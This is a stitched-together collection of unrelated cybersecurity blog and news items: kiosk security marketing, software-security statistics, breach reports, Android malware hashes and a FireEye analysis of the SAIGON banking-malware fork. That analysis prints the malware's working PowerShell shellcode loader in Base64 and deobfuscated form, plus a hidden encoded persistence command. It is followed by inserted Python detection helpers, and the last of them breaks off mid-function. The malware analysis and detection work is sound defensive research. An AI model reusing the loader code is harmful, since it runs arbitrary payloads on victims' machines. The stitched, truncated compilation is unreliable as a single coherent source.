Whether it is an EPOS system at a fast food venue or large display system at a public transport hub, interactive kiosks are becoming popular and trusted conduits for transacting valuable data with customers.

The purpose of interactive kiosks, and the reason for their increasing prevalence, is to drive automation and make processes more efficient. For many businesses and government departments, they are the visible and tangible manifestations of their digital transformation.

Kiosks are information exchanges, delivering data and content and ingesting preferences, orders and payments. With so much data going back and forth, there is huge value; however, wherever there is value you’ll find malicious and criminal activities seeking to spoil, subvert or steal it.

Three categories of Cyber Threat
Kiosks are just the latest in a long line of data-driven objects that need protecting. At stake is the very heart (and public face) of digitally evolved organisations.

Threats to kiosks come in three principal forms:
  • Threats to system integrity – where kiosks are compromised to display something different. Losing control of what your kiosks look like undermines your brand and causes distress to customers. A recent example is a well-known sportswear store in New Zealand, where a kiosk displayed pornography for 9 hours before employees arrived the next morning and disconnected it.
  • Threats to system availability – where kiosks are compromised to display nothing. In other words, they go offline and, instead of displaying some kind of reassuring ‘out of order’ message, give the appearance of a desktop computer with frozen dialogue boxes or raw lines of code. Examples of this are all too common, and are typically characterised by ‘the blue screen of death’.
  • Threats to system confidentiality – where kiosks show no outward signs of compromise, but are in fact collecting data illegally. Such attacks carry significant risk over and above creating nuisance or offence. Examples include one of the largest self-service food vending companies in the US suffering a stealthy attack whereby the payment card details and even biometric data gleaned from users at kiosks may have been jeopardised.
The challenge of curbing these threats is compounded by interactive kiosks’ great virtue: their connectedness. As with any Internet of Things (IoT) endpoint architecture, the potential routes for attack are numerous and could spread from attacks on a company’s internal network, stem from vulnerabilities in kiosk application software, or even result from a direct assault on the kiosk itself.

How Best Practice Regulatory Standards Apply to Kiosks
Regulatory compliance plays a part here, with the EU GDPR and NIS directive (ably supported by comprehensive guidance proffered via the UK NCSC Cyber Assessment Framework) compelling organisations to consider all parts of their endpoint estates with appropriate operational controls, processes and risk management approach in respect of – for example – patch management, privileged user access and data encryption.

Regulatory reforms are all well and good, but technology (AI, machine learning, blockchain, etc.) is evolving rapidly and organisations must be as proactive about the cybersecurity challenge as possible or risk falling behind the digital innovation curve.

Becrypt work with the UK Government and the National Cyber Security Centre (NCSC), to develop solutions in line with core objectives sought by NIS and other regulations, for use in public sector environments. At the same time, we are seeing private sector businesses increasingly coming under the sorts of cyberattacks more commonly associated with the public sector.

Paradox: The Secure, Linux-based OS for Interactive Kiosks
Government research has determined that the best way to mitigate threats to interactive kiosks, and safeguard wider digital transformation objectives, is to secure the kiosk operating system (OS).

Becrypt has developed Paradox, a secure Linux-based OS and management platform for kiosks, in collaboration with NCSC. Paradox incorporates a secure-by-design architecture, ensuring kiosks remain in a known healthy state, free of malware. For organisations concerned about the potential for attack, this provides absolute certainty that every time a machine is switched on, its OS and all its applications have not been compromised.

Likewise, another common concern with kiosks is managing hundreds or even thousands of geographically dispersed devices without being able to check on or remediate system health. Should it detect anything unusual, Paradox will automatically roll back to the last known good state, presenting a functioning system rather than an offline/unavailable one. This avoids the onset of ‘bluescreen’ failures and allows administrators to visualise and manage kiosks in an easy and low-cost way. Automated security and patch management further ensures that devices are always kept up to date.

Paradox is also a very lightweight OS, which shrinks the potential attack surface and ensures the entire kiosk estate is not susceptible to common exploits. It also carries a number of advanced security controls that make it more difficult to attack, such as a sandboxed user account for privilege escalation prevention. OS components are also mounted as ‘read-only’, thereby preventing persistent, targeted attacks.

Spurred on by consumer demand for deeper interactions and easier, more personalised experiences, the exponential growth in interactive kiosks is plain to see in public spaces everywhere. And as this shift encourages more private and public sector organisations to do more with their data, the onus is on all of us to protect it.

State of Software Security v10: 5 Key Takeaways for Developers

In case you missed it, this year we launched our 10th annual State of Software Security (SOSS X) report! Armed with a decade of data, the Veracode team analyzed 85,000 applications to study trends in fix rates, mounting security debt, shifts in vulnerability by language, and more.

What did we uncover? At the core of our research, we found there’s still a need for better remediation processes and more frequent security scans. But we also uncovered some best practices that are leading to significant application security improvements. Read on for a snapshot of key takeaways that can help set you and your organization up for AppSec success in 2020.

Most apps still don’t pass crucial compliance tests

OWASP Top 10 vulnerabilities and SANS 25 software errors represent consensus listings of the most critical flaws in the industry, and while we’ve seen some changes in compliance rates across past editions of our SOSS report, the 10-year trend shows us that things haven’t shifted much as of late. Today, 68 percent of apps fail to pass OWASP on initial scan (down from 77 percent in volume one of SOSS), and 67 percent of apps fail to pass SANS on initial scan – the same figure in volume one as in volume ten.

The fact that these common and serious vulnerabilities are still prevalent in code underscores the fact that we are not creating environments where developers can code securely. The absence of proper secure coding training, as well as the lack of access to the right tools, is clearly creating risk.

Android, PHP, iOS, and C++ have a high frequency of flaws

This year’s data analysis found that over 90 percent of Android, PHP, and iOS applications contain security flaws on initial scan. Ranking over 80 percent were C++, .NET, and Java, while Python and JavaScript came in with the lowest flaw rates.

Language Scans

Why do we see a higher rate of flaws in mobile languages? Perhaps the reason Android and iOS are two of the top offenders is that many mobile applications aren’t properly scanned before they’re uploaded to the Apple App Store and the Google Play Store. Ben Greenwald, Director of Software Engineering at Veracode, explains further:

“One reason Android and iOS applications may tend to have more security flaws on first scan is because mobile developers believe they are already covered. Developers might assume that Apple and Google thoroughly test apps before they’re released, or they rely on Apple and Google for testing under the assumption that a security infrastructure is already in place.”

This issue only further highlights the need for thorough internal and third-party testing processes to ensure that your applications are secure.

Language also adds yet another layer to the issue of unfixed flaws piling up on developer plates; the average security debt for PHP and C++ is massive compared to that of .NET, Android, Java, and JavaScript.

Language Flaw Debt

As two of the top languages for flaw rates, it makes sense that unchecked issues in PHP and C++ can spin out of control for development teams. So, what’s their deal? PHP’s start in the mid-90s came with a basic design that works well for smaller applications and beginners learning to code, but it has since been so widely adopted and stretched beyond its means that it is left highly vulnerable to flaws.

C++ is an incredibly robust language that powers many of the operating systems, browsers, and productivity apps that we use in our daily life. But with that great power comes the great responsibility to manage memory, guard against use-after-free, and keep stacks from exceeding the fill line. These flaws tend to accumulate over time and are easier to introduce than in many of today’s more commonly used higher-level languages.

While some applications are prone to debt buildup because they use multiple languages or a basic flaw-heavy language like PHP, it’s important to consider the steps your team can take to counterbalance the prevalence of flaws – like reprioritization.

Remediation priorities are misaligned for top vulnerabilities

Out of the 85,000 applications tested (including 1.4 million individual scans), our data shows that 83 percent of apps have at least one flaw when they’re initially scanned. That’s an 11 percent increase from volume one to volume ten of the SOSS report – but the good news is we also saw an overall 14 percent decrease in applications with high-severity flaws.

The bad news? Focus is, it seems, not always placed on fixing the right flaws. For example, we found that A10-Logging is ranked the lowest in flaw prevalence but is at the top of the list for fix rate, the bottom of the list for incidents, and doesn’t rank for exploit risk. A5-Access Control is another mystifying trend. It ranks low in prevalence but towards the top of exploit and incident rankings, falling right in the middle of the list for fix rate.

Some flaws and fixes are consistent, though. Both A1-Injection and A2-Authentication sit toward the top of the list across the board, while A8-Deserialization is reliably stable in the bottom half of each category. This discrepancy sheds some light on which flaws are neglected, deferred, targeted, and prioritized, and how DevOps teams can more efficiently rank issues.

Flaws that can be remediated quickly on a small scope are naturally resolved ahead of flaws that are slightly more complicated, but often those severe issues are less difficult to fix, underscoring the need for a more comprehensive plan of attack.

Developers favor recency, adding to security debt

SOSS X shows us that developers typically follow a LIFO (Last In, First Out) method instead of a FIFO (First In, First Out) approach. With LIFO, developers run the risk of contributing to security debt when older flaws are stacked underneath newer issues. As time goes by, the probability of remediation drops significantly, and any unmitigated remnants slide into the land of security debt.

This trend highlights an ongoing battle with security debt across the industry and draws attention to how it muddies the waters of remediation. Fortunately, we have revealing data on scanning cadence that can help reduce an organization’s debt over time.

Bursty scans contribute to security debt – but it’s reversible

We mention security debt throughout the SOSS X report (and this post) because it can leave organizations vulnerable to attacks in the backlog of flaws, and slower to mitigate issues that arise out of the blue.

The good news is, this year we also uncovered evidence of practices that are chipping away at security debt. It’s all about scanning frequency. We know that ‘bursty’ scanning cadences result in a higher prevalence of flaws over time, as opposed to steady and early scan processes with fewer flaws open at once. Sometimes bursty scanning simply fits your waterfall development cycle or pairs with testing schedules that are event-driven, but this can leave security holes where flaws are missed month to month.

Bursty Scans

Based on our data, we know that development teams can improve their median time to remediation (MedianTTR) by about 70 percent with established procedures and consistent testing schedules. Automating your processes to increase scanning tempo and improve prioritization reduces the security debt that your organization carries.

Read the report

Want to see all this data in one complete package? Read the full SOSS report to learn more about the state of DevSecOps, discover additional data highlights by industry, and more.

The state of digital transformation in 2020

The past year has seen many businesses question exactly how transformational digital transformation really is. The answer, as with all IT initiatives, depends on the scope of the ambition, the skill of the leadership, and the ultimate degree of business impact.

Yet we’ve seen a pattern emerge: Those with transformational aspirations discover that boil-the-ocean schemes seldom meet their objectives, while carefully planned and targeted initiatives often have broader benefit than even the original instigators imagined.

The latter is particularly true of initiatives that reform fundamental processes. Transformation usually implies moving from one fixed state to another, yet digital transformation at its best involves a journey from inflexibility to a “permanently agile” condition. Getting there may involve the adoption of new programming, infrastructure, or internet-of-things advances. The biggest rewards, however, accrue from reimagining workflows to accommodate continuous change and establishing mechanisms that continuously measure results.


Advisory 2020-001-4: Active exploitation of critical vulnerability in Citrix Application Delivery Controller and Citrix Gateway

The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC) is aware of ongoing attempts to exploit a critical vulnerability in Citrix Application Delivery Controller (ADC) (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway) and Citrix SD-WAN WANOP. The vulnerability, known as CVE-2019-19781, was disclosed on 17 December 2019 and enables an unauthenticated adversary to execute arbitrary code.

The Consequences of Security Breaches Are Becoming More Severe

With the prevalence of cyberattacks, breaches, and data leaks heading into 2020, it’s becoming commonplace for employees to part ways with their organization after a security incident. Although the consequences from a breach were less severe in the past, reactions are shifting as data leaks are deemed more dire than ever before.

A 2018 report from Kaspersky Lab surveyed 6,000 people in 29 countries and found that, globally, 31 percent of cybersecurity incidents resulted in the layoff of employees at impacted companies. In roughly a third of these cases, those employees holding senior IT positions were most often let go from their roles after a breach or security incident.

The results from Kaspersky’s survey also revealed that 32 percent of C-level managers and CEOs in the United States were laid off post-breach. That number is lower in other countries but still higher overall than most functional roles within and outside of IT, representing a growing trend in how organizations respond to breach backlash. As cybersecurity professionals are in high demand and C-level managers cost a pretty penny, making the decision to part ways is not always easy.

Weathering the post-breach storm

With great power comes great responsibility. In 2017, the CIO of Equifax U.S. Information Solutions, Jun Ying, was sent to jail and forced to pay $55,000 for insider trading after it was discovered that he shared information about a breach before it was made public by the company. In the same year, Uber’s CSO Joe Sullivan was let go after he allegedly helped cover up a bug bounty pay-out for over $100,000, paying attackers in exchange for the deletion of stolen data on 57 million drivers and passengers. Both Sullivan and security lawyer Craig Clark were fired from the company.

Sometimes privacy-minded employees clash with their own organization’s policies and can eliminate a role altogether. For example, Facebook’s former CSO, Alex Stamos, left a security role at the social media powerhouse after he allegedly disagreed with how Facebook handled the very public Cambridge Analytica scandal. In 2018, Facebook made the decision not to replace Stamos and to instead rely on introducing security engineers, analysts, investigators, and other specialists into their engineering and product teams. It was a testament to how fast things can change within an organization’s security team.

In other situations, ex-employees can cause unanticipated headaches with ripple effects of their own. Capital One fell prey to cyberattacker Paige Thompson when she infiltrated the company’s third-party cloud server to access 106 million customer records in 2019. Thompson, previously an Amazon Web Services software engineer, allegedly built a scanning tool that looked for misconfigured cloud servers on the web providing easy access to username and password credentials.

These examples lead to a logical question: if your business is unable to fortify its internal processes and protect sensitive information, is it trustworthy to consumers? With a solid plan for security and remediation in place, the risk of job loss and consumer distrust diminishes.

Getting serious about your security

As breaches and cyberattacks lead to high-profile firings that play out in the media, the public is paying attention. A recent IDG Survey Report, Security as a Competitive Advantage, found that 66 percent of respondents are more likely to work with a vendor whose application security has been validated by an established, independent expert.

Additionally, 99 percent of those surveyed for the report welcome the advantages of working with a certified and secure vendor, such as improved protection of IP data that leads to peace of mind for their customers. There are measures your organization can take to boost customer confidence, give you a competitive advantage, and potentially prevent the loss (monetary or otherwise) from a breach or cyberattack.

In addition to incorporating security testing into your software development, third-party validation of your security efforts shows prospects and customers alike that securing data is a top priority in your organization’s application development process.

Independent security validation comes with a number of benefits, enabling vendors to:

  • Proactively address any questions a prospect might have about security
  • Instill confidence in buyers that they’re choosing a vendor who cares about their data
  • Speed up sales cycles by eliminating the need for back-and-forth validation
  • Stay one step ahead of security concerns from customers and prospects
  • Integrate more efficiently with development teams to improve security

With third-party validation in place, you not only have proof positive that your organization cares about security, but also a roadmap for maturing your application security program. The risk of losing employees to high-profile incidents also diminishes. Eliminating concern and doubt sets you apart with a competitive advantage in the marketplace that sends a clear message to buyers: you’re serious about security.

Learn how the Veracode Verified program can help position you as a trusted and secure vendor so that you’re ready when a prospect comes calling.

Cyber News Rundown: Snake Ransomware

Reading Time: ~ 2 min.

Snake Ransomware Slithers Through Networks

A new ransomware variant, dubbed “Snake,” has been found using more sophisticated obfuscation while targeting entire networks, rather than only one machine. In addition, Snake appends five random characters to the extension of each file it encrypts, after the original filetype. Finally, the infection also modifies a specific file marker and replaces it with “EKANS,” or SNAKE spelled backwards. A free decryptor hasn’t been released yet, and the malware authors have specified that encryption will be for entire networks only.

Minnesota Hospital Data Breach

Sensitive information belonging to nearly 50,000 patients of a Minnesota hospital has been illicitly accessed after multiple employee email addresses were compromised. While in most cases the information accessed was medical data and basic contact info, some patients may have also had their Social Security and driver’s license numbers compromised. Alomere Health has already contacted affected patients and begun providing credit and identity monitoring services.

Cyberattack Finally Cracks Las Vegas Security

For a city that is the target of roughly 280,000 cyber attacks every month, one attack was finally able to make it through Las Vegas security protocols. The attack appears to have stemmed from a malicious email but was quickly quarantined by city IT officials before it could do any critical damage. Earlier in 2019, Las Vegas officials proposed a measure to refuse payments to any cybersecurity threat actors.

Travelex Falls Victim to Sodinokibi Ransomware

On the first day of 2020, foreign travel service provider Travelex experienced a ransomware attack that used unsecured VPNs to infiltrate their systems. To make matters worse, a demand of $6 million has been placed on the company for the return of their data, or else the ransom will be doubled. Since this attack, a scoreboard has been created to track the six additional victims of the Sodinokibi/REvil ransomware campaign.

ATM Skimmer Arrested in New York

At least one individual has been arrested in connection to an ATM skimming ring that has taken over $400,000 from banks in New York and surrounding states. From 2014 to 2016, this group installed card skimmers in an unidentified number of ATMs in order to steal card credentials and build up fraudulent charges. Eleven other people are connected with this incident and will also likely be charged.

The post Cyber News Rundown: Snake Ransomware appeared first on Webroot Blog.

Skype audio graded by workers in China with ‘no security measures’

Exclusive: former Microsoft contractor says he was emailed login after minimal vetting

A Microsoft programme to transcribe and vet audio from Skype and Cortana, its voice assistant, ran for years with “no security measures”, according to a former contractor who says he reviewed thousands of potentially sensitive recordings on his personal laptop from his home in Beijing over the two years he worked for the company.

The recordings, both deliberate and accidentally invoked activations of the voice assistant, as well as some Skype phone calls, were simply accessed by Microsoft workers through a web app running in Google’s Chrome browser, on their personal laptops, over the Chinese internet, according to the contractor.

Continue reading...

PHA Family Highlights: Bread (and Friends)

“So..good..”
“very beautiful”

Later, one-star reviews from real users start appearing with comments like:

“Deception”
“The app is not honest …”

SUMMARY

Sheer volume appears to be the preferred approach for Bread developers. At different times, we have seen three or more active variants using different approaches or targeting different carriers. Within each variant, the malicious code present in each sample may look nearly identical with only one evasion technique changed. Sample 1 may use AES-encrypted strings with reflection, while Sample 2 (submitted on the same day) will use the same code but with plaintext strings.
At peak times of activity, we have seen up to 23 different apps from this family submitted to Play in one day. At other times, Bread appears to abandon hope of making a variant successful and we see a gap of a week or longer before the next variant. This family showcases the amount of resources that malware authors now have to expend. Google Play Protect is constantly updating detection engines and warning users of malicious apps installed on their device.

SELECTED SAMPLES

Package Name                         SHA-256 Digest
com.rabbit.artcamera                 18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f
org.horoscope.astrology.predict      6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26
com.theforest.rotatemarswallpaper    4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09
com.jspany.temp                      0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5
com.hua.ru.quan                      780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86
com.rongnea.udonood                  8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131
com.mbv.a.wp                         01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68
com.pho.nec.sg                       b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b

Dixons Carphone fined £500,000 for massive data breach

‘Systemic failures’ found in the retailer’s management and protection of customer data

Dixons Carphone has been hit with the maximum possible fine after the tills in its shops were compromised by a cyber-attack that affected at least 14 million people.

The retailer discovered the massive data breach last summer and a subsequent investigation by the Information Commissioner’s Office (ICO) found the attacker had installed malicious software on 5,390 tills in branches of its Currys PC World and Dixons Travel chains.

Continue reading...

SAIGON, the Mysterious Ursnif Fork

Ursnif (aka Gozi/Gozi-ISFB) is one of the oldest banking malware families still in active distribution. While the first major version of Ursnif was identified in 2006, several subsequent versions have been released, in large part due to source code leaks. FireEye reported on a previously unidentified variant of the Ursnif malware family to our threat intelligence subscribers in September 2019 after identification of a server that hosted a collection of tools, which included multiple point-of-sale malware families. This malware self-identified as "SaiGon version 3.50 rev 132," and our analysis suggests it is likely based on the source code of the v3 (RM3) variant of Ursnif. Notably, rather than being a full-fledged banking malware, SAIGON's capabilities suggest it is a more generic backdoor, perhaps tailored for use in targeted cybercrime operations.

Technical Analysis

Behavior

SAIGON appears on an infected computer as a Base64-encoded shellcode blob stored in a registry key, which is launched using PowerShell via a scheduled task. As with other Ursnif variants, the main component of the malware is a DLL file. This DLL has a single exported function, DllRegisterServer, which is an unused empty function. All the relevant functionality of the malware executes when the DLL is loaded and initialized via its entry point.

Upon initial execution, the malware generates a machine ID using the creation timestamp of either %SystemDrive%\pagefile.sys or %SystemDrive%\hiberfil.sys (whichever is identified first). Interestingly, the system drive is queried in a somewhat uncommon way, directly from the KUSER_SHARED_DATA structure (via SharedUserData→NtSystemRoot). KUSER_SHARED_DATA is a structure located in a special part of kernel memory that is mapped into the memory space of all user-mode processes (thus shared), and always located at a fixed memory address (0x7ffe0000, pointed to by the SharedUserData symbol).

The code then looks for the current shell process by using a call to GetWindowThreadProcessId(GetShellWindow(), …). The code also features a special check; if the checksum calculated from the name of the shell's parent process matches the checksum of explorer.exe (0xc3c07cf0), it will attempt to inject into the parent process instead.

SAIGON then injects into this process using the classic VirtualAllocEx / WriteProcessMemory / CreateRemoteThread combination of functions. Once this process is injected, it loads two embedded files from within its binary:

  • A PUBLIC.KEY file, which is used to verify and decrypt other embedded files and data coming from the malware's command and control (C2) server
  • A RUN.PS1 file, which is a PowerShell loader script template that contains a "@SOURCE@" placeholder within the script:

$hanksefksgu = [System.Convert]::FromBase64String("@SOURCE@");
Invoke-Expression ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("JHdneG1qZ2J4dGo9JGh
hbmtzZWZrc2d1Lkxlbmd0aDskdHNrdm89IltEbGxJbXBvcnQoYCJrZXJuZWwzMmAiKV1gbnB1YmxpYyBzdGF
0aWMgZXh0ZXJuIEludDMyIEdldEN1cnJlbnRQcm9jZXNzKCk7YG5bRGxsSW1wb3J0KGAidXNlcjMyYCIpXWB
ucHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldERDKEludFB0ciBteHhhaHhvZik7YG5bRGxsSW1wb3J0K
GAia2VybmVsMzJgIildYG5wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgQ3JlYXRlUmVtb3RlVGhyZWFkKEl
udFB0ciBoY3d5bHJicywgSW50UHRyIHdxZXIsdWludCBzZmosSW50UHRyIHdsbGV2LEludFB0ciB3d2RyaWN
0d2RrLHVpbnQga2xtaG5zayxJbnRQdHIgdmNleHN1YWx3aGgpO2BuW0RsbEltcG9ydChgImtlcm5lbDMyYCI
pXWBucHVibGljIHN0YXRpYyBleHRlcm4gVUludDMyIFdhaXRGb3JTaW5nbGVPYmplY3QoSW50UHRyIGFqLC
BVSW50MzIga2R4c3hldik7YG5bRGxsSW1wb3J0KGAia2VybmVsMzJgIildYG5wdWJsaWMgc3RhdGljIGV4dG
VybiBJbnRQdHIgVmlydHVhbEFsbG9jKEludFB0ciB4eSx1aW50IGtuYnQsdWludCB0bXJ5d2h1LHVpbnQgd2d1
dHVkKTsiOyR0c2thYXhvdHhlPUFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICR0c2t2byAtTmFtZSAnV2luMzI
nIC1uYW1lc3BhY2UgV2luMzJGdW5jdGlvbnMgLXBhc3N0aHJ1OyRtaHhrcHVsbD0kdHNrYWF4b3R4ZTo6Vml
ydHVhbEFsbG9jKDAsJHdneG1qZ2J4dGosMHgzMDAwLDB4NDApO1tTeXN0ZW0uUnVudGltZS5JbnRlcm9wU
2VydmljZXMuTWFyc2hhbF06OkNvcHkoJGhhbmtzZWZrc2d1LDAsJG1oeGtwdWxsLCR3Z3htamdieHRqKTskd
GRvY25ud2t2b3E9JHRza2FheG90eGU6OkNyZWF0ZVJlbW90ZVRocmVhZCgtMSwwLDAsJG1oeGtwdWxsLC
RtaHhrcHVsbCwwLDApOyRvY3h4am1oaXltPSR0c2thYXhvdHhlOjpXYWl0Rm9yU2luZ2xlT2JqZWN0KCR0ZG
9jbm53a3ZvcSwzMDAwMCk7")));

The malware replaces the "@SOURCE@" placeholder from this PowerShell script template with a Base64-encoded version of itself, and writes the PowerShell script to a registry value named "PsRun" under the "HKEY_CURRENT_USER\Identities\{<random_guid>}" registry key (Figure 1).


Figure 1: PowerShell script written to PsRun

The instance of SAIGON then creates a new scheduled task (Figure 2) with the name "Power<random_word>" (e.g. PowerSgs). If this is unsuccessful for any reason, it falls back to using the "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" registry key to enable itself to maintain persistence through system reboot.


Figure 2: Scheduled task

Regardless of the persistence mechanism used, the command that executes the binary from the registry is similar to the following:

PowerShell.exe -windowstyle hidden -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANAAzAEIA
OQA1AEUANQBCAC0ARAAyADEAOAAtADAAQQBCADgALQA1AEQANwBGAC0AMgBDADcAOAA5AEMANQA5
AEIAMQBEAEYAfQAnACkALgBQAHMAUgB1AG4A

The -ec argument is the Base64 encoding of the UTF-16LE script text; decoded, the command reads "iex (gp 'HKCU:\Identities\{43B95E5B-D218-0AB8-5D7F-2C789C59B1DF}').PsRun". When executed, it retrieves the contents of the registry value written earlier using Get-ItemProperty (gp) and executes it using Invoke-Expression (iex).
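Added example (not part of the FireEye write-up): a small Python triage helper that reverses the step above for a batch of process command lines, such as a Sysmon event 1 or Security 4688 export. It decodes the -EncodedCommand argument (Base64 of UTF-16LE text) and matches the `iex (gp 'HKCU:\Identities\{GUID}').PsRun` pattern, returning the GUID so the PsRun value can be pulled from the registry for analysis. The first sample command line is the one shown above; the benign line is constructed.

```python
import base64
import re
from typing import List, Optional, Tuple

# The persistence command shown above (the value passed to -ec), copied from the write-up.
SAMPLE_CMDLINE = (
    "PowerShell.exe -windowstyle hidden -ec "
    "aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANAAzAEIA"
    "OQA1AEUANQBCAC0ARAAyADEAOAAtADAAQQBCADgALQA1AEQANwBGAC0AMgBDADcAOAA5AEMANQA5"
    "AEIAMQBEAEYAfQAnACkALgBQAHMAUgB1AG4A"
)

# Constructed benign line: ordinary -EncodedCommand use that must not be flagged.
BENIGN_CMDLINE = ("powershell.exe -NoProfile -EncodedCommand "
                  + base64.b64encode("Get-Date".encode("utf-16-le")).decode())

# iex (gp 'HKCU:\Identities\{GUID}').PsRun, allowing long-form cmdlet names and loose spacing.
PSRUN_RE = re.compile(
    r"(?:iex|invoke-expression)\s*\(\s*(?:gp|get-itemproperty)\s+"
    r"'HKCU:\\Identities\\\{([0-9A-F]{8}-(?:[0-9A-F]{4}-){3}[0-9A-F]{12})\}'\s*\)\s*\.PsRun",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind PowerShell's -EncodedCommand argument, or None.
    -e and -ec are the documented short forms; powershell.exe also matches longer
    prefixes of the parameter name (-enc, -encoded, ...)."""
    argv = cmdline.split()
    for i, arg in enumerate(argv[:-1]):
        a = arg.lower()
        if a in ("-e", "-ec") or (len(a) > 2 and "-encodedcommand".startswith(a)):
            try:
                return base64.b64decode(argv[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def saigon_launcher_guid(cmdline: str) -> Optional[str]:
    """If the command line is SAIGON's registry launcher, return the Identities GUID it reads."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return None
    m = PSRUN_RE.search(decoded)
    return m.group(1).upper() if m else None


def triage(cmdlines: List[str]) -> List[Tuple[str, str]]:
    """Run the check over a batch of process command lines; returns (cmdline, guid) per hit."""
    return [(c, g) for c in cmdlines for g in [saigon_launcher_guid(c)] if g]


if __name__ == "__main__":
    for cmd, guid in triage([SAMPLE_CMDLINE, BENIGN_CMDLINE]):
        print(f"SAIGON launcher found; inspect HKCU\\Identities\\{{{guid}}} value PsRun")
        print("   ", cmd[:60], "...")
```

The decoded GUID is the hunting pivot: the PsRun value under that key holds the Base64 shellcode blob, which can be fed to the converter script in Appendix C.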

Finally, the PowerShell code in the registry allocates a block of executable memory, copies the Base64-decoded shellcode blob into it, starts a new thread at that address using CreateRemoteThread with the current-process pseudo-handle (-1), and waits up to 30 seconds for the thread to complete. The following script is a deobfuscated and beautified version of the PowerShell.

$hanksefksgu = [System.Convert]::FromBase64String("@SOURCE@");
$wgxmjgbxtj = $hanksefksgu.Length;

$tskvo = @"
[DllImport("kernel32")]
public static extern Int32 GetCurrentProcess();

[DllImport("user32")]
public static extern IntPtr GetDC(IntPtr mxxahxof);

[DllImport("kernel32")]
public static extern IntPtr CreateRemoteThread(IntPtr hcwylrbs, IntPtr wqer, uint sfj, IntPtr wllev, IntPtr wwdrictwdk, uint klmhnsk, IntPtr vcexsualwhh);

[DllImport("kernel32")]
public static extern UInt32 WaitForSingleObject(IntPtr aj, UInt32 kdxsxev);

[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr xy, uint knbt, uint tmrywhu, uint wgutud);
"@;

$tskaaxotxe = Add-Type -memberDefinition $tskvo -Name 'Win32' -namespace Win32Functions -passthru;
# RWX allocation sized to the blob: MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40)
$mhxkpull = $tskaaxotxe::VirtualAlloc(0, $wgxmjgbxtj, 0x3000, 0x40);
[System.Runtime.InteropServices.Marshal]::Copy($hanksefksgu, 0, $mhxkpull, $wgxmjgbxtj);
# -1 is the current-process pseudo-handle: a local thread starting at the blob's first byte,
# with the blob's own address passed as the thread parameter
$tdocnnwkvoq = $tskaaxotxe::CreateRemoteThread(-1, 0, 0, $mhxkpull, $mhxkpull, 0, 0);
$ocxxjmhiym = $tskaaxotxe::WaitForSingleObject($tdocnnwkvoq, 30000);

Once it has established a foothold on the machine, SAIGON loads and parses its embedded LOADER.INI configuration (see the Configuration section for details) and starts its main worker thread, which continuously polls the C2 server for commands.

Configuration

The Ursnif source code incorporated a concept referred to as "joined data," which is a set of compressed/encrypted files bundled with the executable file. Early variants relied on a special structure after the PE header and marked with specific magic bytes ("JF," "FJ," "J1," "JJ," depending on the Ursnif version). In Ursnif v3 (Figure 3), this data is no longer simply after the PE header but pointed to by the Security Directory in the PE header, and the magic bytes have also been changed to "WD" (0x4457).


Figure 3: Ursnif v3 joined data

This structure defines the various properties (offset, size, and type) of the bundled files. This is the same exact method used by SAIGON for storing its three embedded files:

  • PUBLIC.KEY - RSA public key
  • RUN.PS1 - PowerShell script template
  • LOADER.INI - Malware configuration
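The following Python is an added example, not code from the write-up: it walks the PE headers with the standard library, reads the Security data directory (index 4, the one directory whose first field is a raw file offset rather than an RVA) and reports whether the referenced blob begins with the 'WD' magic described above. On a legitimately signed binary that directory holds the Authenticode WIN_CERTIFICATE instead, which is what the magic check distinguishes. It stops at the magic because the write-up does not give the field layout of the joined-data table; the minimal PE it builds for testing is a constructed fixture, not a SAIGON sample.

```python
import struct
from typing import Optional, Tuple

IMAGE_DIRECTORY_ENTRY_SECURITY = 4
JOINED_DATA_MAGIC = b"WD"          # 0x4457 when read as a little-endian WORD


def find_joined_data(pe: bytes) -> Optional[Tuple[int, int, bool]]:
    """Return (file_offset, size, starts_with_WD) for the blob referenced by the
    PE Security directory, or None if the image has no usable Security entry.
    The Security entry holds a file offset, not an RVA, so the referenced data
    may sit outside every section, which is how the joined files are stored."""
    try:
        if pe[:2] != b"MZ":
            return None
        e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
        if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return None
        opt = e_lfanew + 0x18                  # optional header follows the 20-byte COFF header
        magic = struct.unpack_from("<H", pe, opt)[0]
        if magic == 0x10B:                     # PE32
            n_dirs_off, dirs_off = opt + 0x5C, opt + 0x60
        elif magic == 0x20B:                   # PE32+
            n_dirs_off, dirs_off = opt + 0x6C, opt + 0x70
        else:
            return None
        n_dirs = struct.unpack_from("<I", pe, n_dirs_off)[0]
        if n_dirs <= IMAGE_DIRECTORY_ENTRY_SECURITY:
            return None
        off, size = struct.unpack_from("<II", pe, dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    except struct.error:
        return None
    if off == 0 or size == 0 or off + size > len(pe):
        return None
    return off, size, pe[off:off + 2] == JOINED_DATA_MAGIC


def build_test_image(blob: bytes, pe32plus: bool = False) -> bytes:
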